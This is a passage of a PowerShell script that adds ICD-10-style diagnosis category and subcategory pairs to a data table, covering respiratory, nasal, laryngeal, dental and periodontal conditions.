carbuncle of nose") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of nose and nasal sinuses","Cyst and mucocele of nose and nasal sinus") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of nose and nasal sinuses","Deviated nasal septum") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of nose and nasal sinuses","Hypertrophy of nasal turbinates") + $null = $DiagnosisList.Rows.Add("Other specified disorders of nose and nasal sinuses","Nasal mucositis (ulcerative)") + $null = $DiagnosisList.Rows.Add("Other specified disorders of nose and nasal sinuses","Other specified disorders of nose and nasal sinuses") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of nose and nasal sinuses","Unspecified disorder of nose and nasal sinuses") + $null = $DiagnosisList.Rows.Add("Chronic tonsillitis and adenoiditis","Chronic tonsillitis") + $null = $DiagnosisList.Rows.Add("Chronic tonsillitis and adenoiditis","Chronic adenoiditis") + $null = $DiagnosisList.Rows.Add("Chronic tonsillitis and adenoiditis","Chronic tonsillitis and adenoiditis") + $null = $DiagnosisList.Rows.Add("Hypertrophy of tonsils","Hypertrophy of tonsils") + $null = $DiagnosisList.Rows.Add("Hypertrophy of adenoids","Hypertrophy of adenoids") + $null = $DiagnosisList.Rows.Add("Hypertrophy of tonsils with hypertrophy of adenoids","Hypertrophy of tonsils with hypertrophy of adenoids") + $null = $DiagnosisList.Rows.Add("Other chronic diseases of tonsils and adenoids","Other chronic diseases of tonsils and adenoids") + $null = $DiagnosisList.Rows.Add("Chronic disease of tonsils and adenoids, unspecified","Chronic disease of tonsils and adenoids, unspecified") + $null = $DiagnosisList.Rows.Add("Peritonsillar abscess","Peritonsillar abscess") + $null = $DiagnosisList.Rows.Add("Chronic laryngitis and laryngotracheitis","Chronic laryngitis") + $null = $DiagnosisList.Rows.Add("Chronic laryngitis and laryngotracheitis","Chronic laryngotracheitis") + $null = $DiagnosisList.Rows.Add("Paralysis of vocal cords and larynx","Paralysis of vocal cords and larynx, unspecified") + $null = $DiagnosisList.Rows.Add("Paralysis of vocal cords and larynx","Paralysis of vocal cords and larynx, unilateral") + $null = $DiagnosisList.Rows.Add("Paralysis of vocal cords and larynx","Paralysis of vocal cords and larynx, bilateral") + $null = $DiagnosisList.Rows.Add("Polyp of vocal cord and larynx","Polyp of vocal cord and larynx") + $null = $DiagnosisList.Rows.Add("Nodules of vocal cords","Nodules of vocal cords") + $null = $DiagnosisList.Rows.Add("Other diseases of vocal cords","Other diseases of vocal cords") + $null = $DiagnosisList.Rows.Add("Edema of larynx","Edema of larynx") + $null = $DiagnosisList.Rows.Add("Laryngeal spasm","Laryngeal spasm") + $null = $DiagnosisList.Rows.Add("Stenosis of larynx","Stenosis of larynx") + $null = $DiagnosisList.Rows.Add("Other diseases of larynx","Other diseases of larynx") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Retropharyngeal and parapharyngeal abscess") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Other abscess of pharynx") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Other diseases of pharynx") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Upper respiratory tract hypersensitivity reaction, site unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Other specified diseases of upper respiratory tract") + $null = $DiagnosisList.Rows.Add("Other diseases of upper respiratory tract","Disease of upper respiratory tract, unspecified") + $null = $DiagnosisList.Rows.Add("Bronchitis, not specified as acute or chronic","Bronchitis, not specified as acute or chronic") + $null = $DiagnosisList.Rows.Add("Simple and mucopurulent chronic bronchitis","Simple chronic bronchitis") + $null = $DiagnosisList.Rows.Add("Simple and mucopurulent chronic bronchitis","Mucopurulent chronic bronchitis") + $null = $DiagnosisList.Rows.Add("Simple and mucopurulent chronic bronchitis","Mixed simple and mucopurulent chronic bronchitis") + $null = $DiagnosisList.Rows.Add("Unspecified chronic bronchitis","Unspecified chronic bronchitis") + $null = $DiagnosisList.Rows.Add("Emphysema","Unilateral pulmonary emphysema [MacLeod's syndrome]") + $null = $DiagnosisList.Rows.Add("Emphysema","Panlobular emphysema") + $null = $DiagnosisList.Rows.Add("Emphysema","Centrilobular emphysema") + $null = $DiagnosisList.Rows.Add("Emphysema","Other emphysema") + $null = $DiagnosisList.Rows.Add("Emphysema","Emphysema, unspecified") + $null = $DiagnosisList.Rows.Add("Other chronic obstructive pulmonary disease","Chronic obstructive pulmonary disease with acute lower respiratory infection") + $null = $DiagnosisList.Rows.Add("Other chronic obstructive pulmonary disease","Chronic obstructive pulmonary disease with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Other chronic obstructive pulmonary disease","Chronic obstructive pulmonary disease, unspecified") + $null = $DiagnosisList.Rows.Add("Mild intermittent asthma","Mild intermittent asthma, uncomplicated") + $null = $DiagnosisList.Rows.Add("Mild intermittent asthma","Mild intermittent asthma with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Mild intermittent asthma","Mild intermittent asthma with status asthmaticus") + $null = $DiagnosisList.Rows.Add("Mild persistent asthma","Mild persistent asthma, uncomplicated") + $null = $DiagnosisList.Rows.Add("Mild persistent asthma","Mild persistent asthma with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Mild persistent asthma","Mild persistent asthma with status asthmaticus") + $null = $DiagnosisList.Rows.Add("Moderate persistent asthma","Moderate persistent asthma, uncomplicated") + $null = $DiagnosisList.Rows.Add("Moderate persistent asthma","Moderate persistent asthma with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Moderate persistent asthma","Moderate persistent asthma with status asthmaticus") + $null = $DiagnosisList.Rows.Add("Severe persistent asthma","Severe persistent asthma, uncomplicated") + $null = $DiagnosisList.Rows.Add("Severe persistent asthma","Severe persistent asthma with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Severe persistent asthma","Severe persistent asthma with status asthmaticus") + $null = $DiagnosisList.Rows.Add("Unspecified asthma","Unspecified asthma with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Unspecified asthma","Unspecified asthma with status asthmaticus") + $null = $DiagnosisList.Rows.Add("Unspecified asthma","Unspecified asthma, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other asthma","Exercise induced bronchospasm") + $null = $DiagnosisList.Rows.Add("Other asthma","Cough variant asthma") + $null = $DiagnosisList.Rows.Add("Other asthma","Other asthma") + $null = $DiagnosisList.Rows.Add("Bronchiectasis","Bronchiectasis with acute lower respiratory infection") + $null = $DiagnosisList.Rows.Add("Bronchiectasis","Bronchiectasis with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Bronchiectasis","Bronchiectasis, uncomplicated") + $null = $DiagnosisList.Rows.Add("Coalworker's pneumoconiosis","Coalworker's pneumoconiosis") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to asbestos and other mineral fibers","Pneumoconiosis due to asbestos and other mineral fibers") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to dust containing silica","Pneumoconiosis due to talc dust") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to dust containing silica","Pneumoconiosis due to other dust containing silica") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Aluminosis (of lung)") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Bauxite fibrosis (of lung)") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Berylliosis") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Graphite fibrosis (of lung)") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Siderosis") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Stannosis") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis due to other inorganic dusts","Pneumoconiosis due to other specified inorganic dusts") + $null = $DiagnosisList.Rows.Add("Unspecified pneumoconiosis","Unspecified pneumoconiosis") + $null = $DiagnosisList.Rows.Add("Pneumoconiosis associated with tuberculosis","Pneumoconiosis associated with tuberculosis") + $null = $DiagnosisList.Rows.Add("Airway disease due to specific organic dust","Byssinosis") + $null = $DiagnosisList.Rows.Add("Airway disease due to specific organic dust","Flax-dressers' disease") + $null = $DiagnosisList.Rows.Add("Airway disease due to specific organic dust","Cannabinosis") + $null = $DiagnosisList.Rows.Add("Airway disease due to specific organic dust","Airway disease due to other specific organic dusts") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Farmer's lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Bagassosis") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Bird fancier's lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Suberosis") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Maltworker's lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Mushroom-worker's lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Maple-bark-stripper's lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Air conditioner and humidifier lung") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Hypersensitivity pneumonitis due to other organic dusts") + $null = $DiagnosisList.Rows.Add("Hypersensitivity pneumonitis due to organic dust","Hypersensitivity pneumonitis due to unspecified organic dust") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Bronchitis and pneumonitis due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Pulmonary edema due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Upper respiratory inflammation due to chemicals, gases, fumes and vapors, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Other acute and subacute respiratory conditions due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Chronic respiratory conditions due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Other respiratory conditions due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to inhalation of chemicals, gases, fumes and vapors","Unspecified respiratory condition due to chemicals, gases, fumes and vapors") + $null = $DiagnosisList.Rows.Add("Pneumonitis due to solids and liquids","Pneumonitis due to inhalation of food and vomit") + $null = $DiagnosisList.Rows.Add("Pneumonitis due to solids and liquids","Pneumonitis due to inhalation of oils and essences") + $null = $DiagnosisList.Rows.Add("Pneumonitis due to solids and liquids","Pneumonitis due to inhalation of other solids and liquids") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Acute pulmonary manifestations due to radiation") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Chronic and other pulmonary manifestations due to radiation") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Acute drug-induced interstitial lung disorders") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Chronic drug-induced interstitial lung disorders") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Drug-induced interstitial lung disorders, unspecified") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Respiratory conditions due to smoke inhalation") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Respiratory conditions due to other specified external agents") + $null = $DiagnosisList.Rows.Add("Respiratory conditions due to other external agents","Respiratory conditions due to unspecified external agent") + $null = $DiagnosisList.Rows.Add("Acute respiratory distress syndrome","Acute respiratory distress syndrome") + $null = $DiagnosisList.Rows.Add("Pulmonary edema","Acute pulmonary edema") + $null = $DiagnosisList.Rows.Add("Pulmonary edema","Chronic pulmonary edema") + $null = $DiagnosisList.Rows.Add("Pulmonary eosinophilia, not elsewhere classified","Pulmonary eosinophilia, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Alveolar and parieto-alveolar conditions","Alveolar proteinosis") + $null = $DiagnosisList.Rows.Add("Alveolar and parieto-alveolar conditions","Pulmonary alveolar microlithiasis") + $null = $DiagnosisList.Rows.Add("Alveolar and parieto-alveolar conditions","Idiopathic pulmonary hemosiderosis") + $null = $DiagnosisList.Rows.Add("Alveolar and parieto-alveolar conditions","Other alveolar and parieto-alveolar conditions") + $null = $DiagnosisList.Rows.Add("Other interstitial pulmonary diseases with fibrosis","Pulmonary fibrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Idiopathic interstitial pneumonia, not otherwise specified") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Idiopathic pulmonary fibrosis") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Idiopathic non-specific interstitial pneumonitis") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Acute interstitial pneumonitis") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Respiratory bronchiolitis interstitial lung disease") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Cryptogenic organizing pneumonia") + $null = $DiagnosisList.Rows.Add("Idiopathic interstitial pneumonia","Desquamative interstitial pneumonia") + $null = $DiagnosisList.Rows.Add("Other interstitial pulmonary diseases with fibrosis in diseases classified elsewhere","Other interstitial pulmonary diseases with fibrosis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Lymphoid interstitial pneumonia","Lymphoid interstitial pneumonia") + $null = $DiagnosisList.Rows.Add("Other specified interstitial pulmonary diseases","Lymphangioleiomyomatosis") + $null = $DiagnosisList.Rows.Add("Other specified interstitial pulmonary diseases","Adult pulmonary Langerhans cell histiocytosis") + $null = $DiagnosisList.Rows.Add("Other specified interstitial pulmonary diseases","Surfactant mutations of the lung") + $null = $DiagnosisList.Rows.Add("Other interstitial lung diseases of childhood","Neuroendocrine cell hyperplasia of infancy") + $null = $DiagnosisList.Rows.Add("Other interstitial lung diseases of childhood","Pulmonary interstitial glycogenosis") + $null = $DiagnosisList.Rows.Add("Other interstitial lung diseases of childhood","Alveolar capillary dysplasia with vein misalignment") + $null = $DiagnosisList.Rows.Add("Other interstitial lung diseases of childhood","Other interstitial lung diseases of childhood") + $null = $DiagnosisList.Rows.Add("Other specified interstitial pulmonary diseases","Other specified interstitial pulmonary diseases") + $null = $DiagnosisList.Rows.Add("Interstitial pulmonary disease, unspecified","Interstitial pulmonary disease, unspecified") + $null = $DiagnosisList.Rows.Add("Abscess of lung and mediastinum","Gangrene and necrosis of lung") + $null = $DiagnosisList.Rows.Add("Abscess of lung and mediastinum","Abscess of lung with pneumonia") + $null = $DiagnosisList.Rows.Add("Abscess of lung and mediastinum","Abscess of lung without pneumonia") + $null = $DiagnosisList.Rows.Add("Abscess of lung and mediastinum","Abscess of mediastinum") + $null = $DiagnosisList.Rows.Add("Pyothorax","Pyothorax with fistula") + $null = $DiagnosisList.Rows.Add("Pyothorax","Pyothorax without fistula") + $null = $DiagnosisList.Rows.Add("Pleural effusion, not elsewhere classified","Pleural effusion, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pleural effusion in conditions classified elsewhere","Malignant pleural effusion") + $null = $DiagnosisList.Rows.Add("Pleural effusion in conditions classified elsewhere","Pleural effusion in other conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Pleural plaque","Pleural plaque with presence of asbestos") + $null = $DiagnosisList.Rows.Add("Pleural plaque","Pleural plaque without asbestos") + $null = $DiagnosisList.Rows.Add("Pneumothorax and air leak","Spontaneous tension pneumothorax") + $null = $DiagnosisList.Rows.Add("Other spontaneous pneumothorax","Primary spontaneous pneumothorax") + $null = $DiagnosisList.Rows.Add("Other spontaneous pneumothorax","Secondary spontaneous pneumothorax") + $null = $DiagnosisList.Rows.Add("Other pneumothorax and air leak","Chronic pneumothorax") + $null = $DiagnosisList.Rows.Add("Other pneumothorax and air leak","Other air leak") + $null = $DiagnosisList.Rows.Add("Other pneumothorax and air leak","Other pneumothorax") + $null = $DiagnosisList.Rows.Add("Pneumothorax, unspecified","Pneumothorax, unspecified") + $null = $DiagnosisList.Rows.Add("Other pleural conditions","Chylous effusion") + $null = $DiagnosisList.Rows.Add("Other pleural conditions","Fibrothorax") + $null = $DiagnosisList.Rows.Add("Other pleural conditions","Hemothorax") + $null = $DiagnosisList.Rows.Add("Other pleural conditions","Other specified pleural conditions") + $null = $DiagnosisList.Rows.Add("Other pleural conditions","Pleural condition, unspecified") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Unspecified tracheostomy complication") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Hemorrhage from tracheostomy stoma") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Infection of tracheostomy stoma") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Malfunction of tracheostomy stoma") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Tracheo-esophageal fistula following tracheostomy") + $null = $DiagnosisList.Rows.Add("Tracheostomy complications","Other tracheostomy complication") + $null = $DiagnosisList.Rows.Add("Acute pulmonary insufficiency following thoracic surgery","Acute pulmonary insufficiency following thoracic surgery") + $null = $DiagnosisList.Rows.Add("Acute pulmonary insufficiency following nonthoracic surgery","Acute pulmonary insufficiency following nonthoracic surgery") + $null = $DiagnosisList.Rows.Add("Chronic pulmonary insufficiency following surgery","Chronic pulmonary insufficiency following surgery") + $null = $DiagnosisList.Rows.Add("Chemical pneumonitis due to anesthesia","Chemical pneumonitis due to anesthesia") + $null = $DiagnosisList.Rows.Add("Postprocedural subglottic stenosis","Postprocedural subglottic stenosis") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a respiratory system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a respiratory system organ or structure complicating a respiratory system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a respiratory system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a respiratory system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a respiratory system organ or structure during a procedure","Accidental puncture and laceration of a respiratory system organ or structure during a respiratory system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a respiratory system organ or structure during a procedure","Accidental puncture and laceration of a respiratory system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural pneumothorax and air leak","Postprocedural pneumothorax") + $null = $DiagnosisList.Rows.Add("Postprocedural pneumothorax and air leak","Postprocedural air leak") + $null = $DiagnosisList.Rows.Add("Postprocedural respiratory failure","Acute postprocedural respiratory failure") + $null = $DiagnosisList.Rows.Add("Postprocedural respiratory failure","Acute and chronic postprocedural respiratory failure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a respiratory system organ or structure following a procedure","Postprocedural hemorrhage of a respiratory system organ or structure following a respiratory system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a respiratory system organ or structure following a procedure","Postprocedural hemorrhage of a respiratory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Transfusion-related acute lung injury (TRALI)","Transfusion-related acute lung injury (TRALI)") + $null = $DiagnosisList.Rows.Add("Complication of respirator [ventilator]","Mechanical complication of respirator") + $null = $DiagnosisList.Rows.Add("Complication of respirator [ventilator]","Ventilator associated pneumonia") + $null = $DiagnosisList.Rows.Add("Complication of respirator [ventilator]","Other complication of respirator [ventilator]") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a respiratory system organ or structure following a procedure","Postprocedural hematoma of a respiratory system organ or structure following a respiratory system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a respiratory system organ or structure following a procedure","Postprocedural hematoma of a respiratory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a respiratory system organ or structure following a procedure","Postprocedural seroma of a respiratory system organ or structure following a respiratory system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a respiratory system organ or structure following a procedure","Postprocedural seroma of a respiratory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative complications of respiratory system, not elsewhere classified","Other intraoperative complications of respiratory system, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of respiratory system, not elsewhere classified","Other postprocedural complications and disorders of respiratory system, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Acute respiratory failure","Acute respiratory failure, unspecified whether with hypoxia or hypercapnia") + $null = $DiagnosisList.Rows.Add("Acute respiratory failure","Acute respiratory failure with hypoxia") + $null = $DiagnosisList.Rows.Add("Acute respiratory failure","Acute respiratory failure with hypercapnia") + $null = $DiagnosisList.Rows.Add("Chronic respiratory failure","Chronic respiratory failure, unspecified whether with hypoxia or hypercapnia") + $null = $DiagnosisList.Rows.Add("Chronic respiratory failure","Chronic respiratory failure with hypoxia") + $null = $DiagnosisList.Rows.Add("Chronic respiratory failure","Chronic respiratory failure with hypercapnia") + $null = $DiagnosisList.Rows.Add("Acute and chronic respiratory failure","Acute and chronic respiratory failure, unspecified whether with hypoxia or hypercapnia") + $null = $DiagnosisList.Rows.Add("Acute and chronic respiratory failure","Acute and chronic respiratory failure with hypoxia") + $null = $DiagnosisList.Rows.Add("Acute and chronic respiratory failure","Acute and chronic respiratory failure with hypercapnia") + $null = $DiagnosisList.Rows.Add("Respiratory failure, unspecified","Respiratory failure, unspecified, unspecified whether with hypoxia or hypercapnia") + $null = $DiagnosisList.Rows.Add("Respiratory failure, unspecified","Respiratory failure, unspecified with hypoxia") + $null = $DiagnosisList.Rows.Add("Respiratory failure, unspecified","Respiratory failure, unspecified with hypercapnia") + $null = $DiagnosisList.Rows.Add("Diseases of bronchus, not elsewhere classified","Acute bronchospasm") + $null = $DiagnosisList.Rows.Add("Diseases of bronchus, not elsewhere classified","Other diseases of bronchus, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pulmonary collapse","Atelectasis") + $null = $DiagnosisList.Rows.Add("Pulmonary collapse","Other pulmonary collapse") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema","Interstitial emphysema") + $null = $DiagnosisList.Rows.Add("Compensatory emphysema","Compensatory emphysema") + $null = $DiagnosisList.Rows.Add("Other disorders of lung","Other disorders of lung") + $null = $DiagnosisList.Rows.Add("Diseases of mediastinum, not elsewhere classified","Mediastinitis") + $null = $DiagnosisList.Rows.Add("Diseases of mediastinum, not elsewhere classified","Other diseases of mediastinum, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Disorders of diaphragm","Disorders of diaphragm") + $null = $DiagnosisList.Rows.Add("Other specified respiratory disorders","Other specified respiratory disorders") + $null = $DiagnosisList.Rows.Add("Respiratory disorder, unspecified","Respiratory disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Respiratory disorders in diseases classified elsewhere","Respiratory disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Anodontia") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Supernumerary teeth") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Abnormalities of size and form of teeth") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Mottled teeth") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Disturbances in tooth formation") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Hereditary disturbances in tooth structure, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Disturbances in tooth eruption") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Teething syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Other disorders of tooth development") + $null = $DiagnosisList.Rows.Add("Disorders of tooth development and eruption","Disorder of tooth development, unspecified") + $null = $DiagnosisList.Rows.Add("Embedded and impacted teeth","Embedded teeth") + $null = $DiagnosisList.Rows.Add("Embedded and impacted teeth","Impacted teeth") + $null = $DiagnosisList.Rows.Add("Dental caries","Arrested dental caries") + $null = $DiagnosisList.Rows.Add("Dental caries on pit and fissure surface","Dental caries on pit and fissure surface limited to enamel") + $null = $DiagnosisList.Rows.Add("Dental caries on pit and fissure surface","Dental caries on pit and fissure surface penetrating into dentin") + $null = $DiagnosisList.Rows.Add("Dental caries on pit and fissure surface","Dental caries on pit and fissure surface penetrating into pulp") + $null = $DiagnosisList.Rows.Add("Dental caries on smooth surface","Dental caries on smooth surface limited to enamel") + $null = $DiagnosisList.Rows.Add("Dental caries on smooth surface","Dental caries on smooth surface penetrating into dentin") + $null = $DiagnosisList.Rows.Add("Dental caries on smooth surface","Dental caries on smooth surface penetrating into pulp") + $null = $DiagnosisList.Rows.Add("Dental root caries","Dental root caries") + $null = $DiagnosisList.Rows.Add("Dental caries, unspecified","Dental caries, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Excessive attrition of teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Abrasion of teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Erosion of teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Pathological resorption of teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Hypercementosis") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Ankylosis of teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Deposits [accretions] on teeth") + $null = $DiagnosisList.Rows.Add("Other diseases of hard tissues of teeth","Posteruptive color changes of dental hard tissues") + $null = $DiagnosisList.Rows.Add("Other specified diseases of hard tissues of teeth","Cracked tooth") + $null = $DiagnosisList.Rows.Add("Other specified diseases of hard tissues of teeth","Other specified diseases of hard tissues of teeth") + $null = $DiagnosisList.Rows.Add("Disease of hard tissues of teeth, unspecified","Disease of hard tissues of teeth, unspecified") + $null = $DiagnosisList.Rows.Add("Pulpitis","Reversible pulpitis") + $null = $DiagnosisList.Rows.Add("Pulpitis","Irreversible pulpitis") + $null = $DiagnosisList.Rows.Add("Necrosis of pulp","Necrosis of pulp") + $null = $DiagnosisList.Rows.Add("Pulp degeneration","Pulp degeneration") + $null = $DiagnosisList.Rows.Add("Abnormal hard tissue formation in pulp","Abnormal hard tissue formation in pulp") + $null = $DiagnosisList.Rows.Add("Acute apical periodontitis of pulpal origin","Acute apical periodontitis of pulpal origin") + $null = $DiagnosisList.Rows.Add("Chronic apical periodontitis","Chronic apical periodontitis") + $null = $DiagnosisList.Rows.Add("Periapical abscess with sinus","Periapical abscess with sinus") + $null = $DiagnosisList.Rows.Add("Periapical abscess without sinus","Periapical abscess without sinus") + $null = $DiagnosisList.Rows.Add("Radicular cyst","Radicular cyst") + $null = $DiagnosisList.Rows.Add("Other and unspecified diseases of pulp and periapical tissues","Unspecified diseases of pulp and periapical tissues") + $null = $DiagnosisList.Rows.Add("Other and unspecified diseases of pulp and periapical tissues","Other diseases of pulp and periapical tissues") + $null = $DiagnosisList.Rows.Add("Acute gingivitis","Acute gingivitis, plaque induced") + $null = $DiagnosisList.Rows.Add("Acute gingivitis","Acute gingivitis, non-plaque induced") + $null = $DiagnosisList.Rows.Add("Chronic gingivitis","Chronic gingivitis, plaque induced") + $null = $DiagnosisList.Rows.Add("Chronic gingivitis","Chronic gingivitis, non-plaque induced") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis","Aggressive periodontitis, unspecified") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, localized","Aggressive periodontitis, localized, slight") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, localized","Aggressive periodontitis, localized, moderate") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, localized","Aggressive periodontitis, localized, severe") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, localized","Aggressive periodontitis, localized, unspecified severity") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, generalized","Aggressive periodontitis, generalized, slight") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, generalized","Aggressive periodontitis, generalized, moderate") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, generalized","Aggressive periodontitis, generalized, severe") + $null = $DiagnosisList.Rows.Add("Aggressive periodontitis, generalized","Aggressive periodontitis, generalized, unspecified severity") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis","Chronic periodontitis, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, localized","Chronic periodontitis, localized, slight") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, localized","Chronic periodontitis, localized, moderate") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, localized","Chronic periodontitis, localized, severe") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, localized","Chronic periodontitis, localized, unspecified severity") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, generalized","Chronic periodontitis, generalized, slight") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, generalized","Chronic periodontitis, generalized, moderate") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, generalized","Chronic periodontitis, generalized, severe") + $null = $DiagnosisList.Rows.Add("Chronic periodontitis, generalized","Chronic periodontitis, generalized, unspecified severity") + $null = $DiagnosisList.Rows.Add("Periodontosis","Periodontosis") + $null = $DiagnosisList.Rows.Add("Other periodontal diseases","Other periodontal diseases") + $null = $DiagnosisList.Rows.Add("Periodontal disease, unspecified","Periodontal disease, unspecified") + $null = $DiagnosisList.Rows.Add("Gingival recession, localized","Localized gingival recession, 